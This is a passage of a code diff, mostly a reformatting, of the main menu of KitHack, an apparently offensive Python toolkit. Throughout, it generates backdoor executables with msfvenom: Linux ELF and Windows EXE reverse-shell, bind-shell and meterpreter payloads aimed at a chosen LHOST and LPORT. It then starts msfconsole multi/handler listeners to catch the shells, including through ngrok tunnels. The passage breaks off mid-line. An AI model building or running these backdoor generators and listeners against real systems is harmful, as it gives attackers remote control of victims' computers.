DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2046,55 +1614,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2109,29 +1667,32 @@ def main(): elif sys == "02": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} windows/x64/meterpreter_reverse_http".format(WHITE, YELLOW) - ) - print( - "{0}[02]{1} windows/x64/meterpreter_reverse_https".format(WHITE, YELLOW) - ) - print( - "{0}[03]{1} windows/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW) - ) - print( - "{0}[04]{1} windows/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW) - ) - print("{0}[05]{1} windows/x64/powershell_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[06]{1} windows/x64/shell_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[07]{1} windows/meterpreter_reverse_http".format(WHITE, YELLOW)) - print("{0}[08]{1} windows/meterpreter_reverse_https".format(WHITE, YELLOW)) - print("{0}[09]{1} windows/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[10]{1} windows/meterpreter/reverse_tcp".format(WHITE, YELLOW)) - print( - "{0}[11]{1} windows/meterpreter/reverse_tcp_dns".format(WHITE, YELLOW) - ) - print("{0}[12]{1} windows/metsvc_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[13]{1} windows/powershell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[01]{1} windows/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} windows/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} windows/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} windows/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} windows/x64/powershell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[06]{1} windows/x64/shell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[07]{1} windows/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[08]{1} windows/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[09]{1} windows/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[10]{1} windows/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[11]{1} windows/meterpreter/reverse_tcp_dns".format( + WHITE, YELLOW)) + print("{0}[12]{1} windows/metsvc_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[13]{1} windows/powershell_reverse_tcp".format( + WHITE, YELLOW)) print("{0}[14]{1} windows/shell_reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -2141,55 +1702,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2199,55 +1750,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2257,55 +1798,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2315,55 +1846,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2373,55 +1894,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2431,55 +1942,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2489,55 +1990,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2547,55 +2038,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK 